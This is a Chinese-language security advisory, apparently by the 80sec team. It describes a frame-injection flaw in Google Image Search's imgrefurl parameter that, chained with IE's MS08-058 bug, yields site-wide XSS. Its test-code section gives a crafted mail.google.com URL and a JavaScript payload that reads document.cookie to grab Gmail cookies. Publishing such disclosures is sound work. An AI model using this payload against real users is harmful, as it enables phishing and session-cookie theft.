漏洞說明:Google是全球最大的搜索引擎。同時Google擁有其他龐大的WEB應用程序產品線,涉及EMAIL、BLOG、在線文檔、個人主頁、電子地圖、論壇、RSS等互聯網幾乎所有的應用業務。80sec發現Google提供的圖片搜索服務存在安全問題,結合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務和獲得目標用戶的認證信息。
漏洞站點:http://www.google.com
漏洞解析:Google提供的圖片搜索服務存在網頁框架安全問題,惡意攻擊者可以指定網頁的內嵌框架頁指向任意網頁。該服務提供的URL地址主域名可以更改成Google的其他業務的子域名,從而造成嚴重的釣魚網頁攻擊隱患。如下:黑客指定imgrefurl參數就可能構造GMAIL相關服務的釣魚網頁。
http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com
該漏洞結合由80SEC團隊成員發現的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞,linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網頁框架安全問題,子框架網頁可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制,可以跨域控制其他域的網頁,影響所有的WEB應用。微軟已經在08年10月提供了MS08-058補丁修復了該漏洞。
測試代碼:
將Google的漏洞頁指向MS08-058漏洞攻擊頁
http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com
MS08-058.htm內容
<script>
setTimeout (
function(){
parent.location.href = new String("javascript:alert(document.cookie)");
}
,1500);
</script>
即可獲得GAMIL的Cookie信息
危害提醒:
黑客利用瀏覽器漏洞可以使這種類型的低風險Web安全漏洞擴大成影響所有Web應用的高風險安全問題,請各大網站及安全管理人員仔細分析評估MS08-058類型的Web安全問題。